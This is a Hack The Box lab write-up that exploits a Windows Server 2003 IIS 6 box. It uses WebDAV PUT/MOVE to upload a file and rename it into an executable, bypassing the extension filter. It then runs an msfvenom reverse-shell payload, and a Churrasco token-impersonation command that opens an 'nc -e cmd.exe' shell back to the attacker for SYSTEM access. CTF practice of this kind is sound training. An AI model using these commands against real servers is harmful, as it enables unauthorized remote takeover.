HTB: Granny
← Back to the log
October 7, 2026·Johnytiger

HTB: Granny

A Windows Server 2003 box running IIS 6 with WebDAV write methods left enabled. The upload filter checks the extension rather than the file, so you upload as text and rename it into something the server will execute, then take SYSTEM with a token impersonation tool from the same era.

securityctfwriteuphacktheboxwindowswebwebdavprivilege escalation

Looking at our nmap scan we can see there is an app on port 80, so let's go check this out.

The landing page, a default IIS Under Construction notice with no real content

It's a page under construction. Looking back at the nmap scan we can see we have a lot of methods and public options going on here.

The nmap output for port 80, showing IIS 6.0 and a WebDAV scan listing PUT, MOVE, COPY, DELETE and the rest of the write methods as allowed

This is WebDAV, and the scan is telling us the write methods are enabled. That's the whole box right there: if the server lets us PUT a file and MOVE it afterwards, we can put something on disk and then rename it into something the server will execute. Let's run davtest and see exactly what we can do.

davtest -url http://10.129.95.234

davtest uploading test files, where text and several script extensions succeed on PUT but asp and aspx are refused

We can upload text files, and crucially we can also rename a file by moving it. Note that uploading an aspx directly fails. The filter is on the extension at upload time, not on what the file is, so we upload as something allowed and rename afterwards.

Let's create our reverse shell with msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.211 LPORT=443 -f aspx -o shell.txt

Now we upload the file with PUT.

curl -X PUT http://10.129.95.234/shell.txt --data-binary @shell.txt

Then we MOVE it to rename it into something IIS will run.

curl -X MOVE -H 'Destination: http://10.129.95.234/shell.aspx' http://10.129.95.234/shell.txt

Now we start our listener and hit the shell.

nc -lnvp 443

The payload being generated, then the listener catching a callback as the IIS service account on Windows Server 2003

We're in. Let's check our privileges.

whoami /priv

whoami showing the impersonate privilege enabled on the service account

We have the impersonate privilege, which is the usual route off a service account. Let's check what we're actually running on.

systeminfo

systeminfo identifying the host as Windows Server 2003 Standard Edition, Service Pack 2, originally installed in 2017

Confirmed, this is an old Windows Server 2003, so we have a few options. The modern potato tools all target far newer builds, so for this vintage the right tool is Churrasco, which abuses token impersonation on 2003 specifically.

The Churrasco binary on GitHub

We download it and upload it the same way as before, as a text file and then moved into place. We also need netcat on the box, brought over the same way.

curl -X PUT http://10.129.95.234/churrasco.txt --data-binary @churrasco.exe
curl -X MOVE -H 'Destination: http://10.129.95.234/churrasco.exe' http://10.129.95.234/churrasco.txt

curl -X PUT http://10.129.95.234/nc.txt --data-binary @nc.exe
curl -X MOVE -H 'Destination: http://10.129.95.234/nc.exe' http://10.129.95.234/nc.txt

Then from the shell we run it, pointing it at a second listener.

churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 10.10.14.211 4444"

Churrasco walking the Rpcss service threads, impersonating a token and reporting that the command ran as SYSTEM

It worked. Let's confirm what we have on the new connection.

nc -lnvp 4444
whoami /priv

The second listener catching a SYSTEM shell, with a full privilege list including debug, take ownership and act as part of the operating system

Full privileges. Let's grab those flags. We head over to the Lakis desktop for the user flag.

type user.txt

Listing the Lakis desktop and reading user.txt, with the flag value blurred out

Now we head over to the Administrator desktop and grab the root flag.

type root.txt

Reading root.txt on the Administrator desktop, with the flag value blurred out

This box was pretty easy and not practical. Honestly this is something that won't be seen in the wild unless it's a granny still running a Windows 2003 server. Cool fun box though.

End of transmissionAll posts
Drive
Johnytiger
HTB: Granny · Johnytiger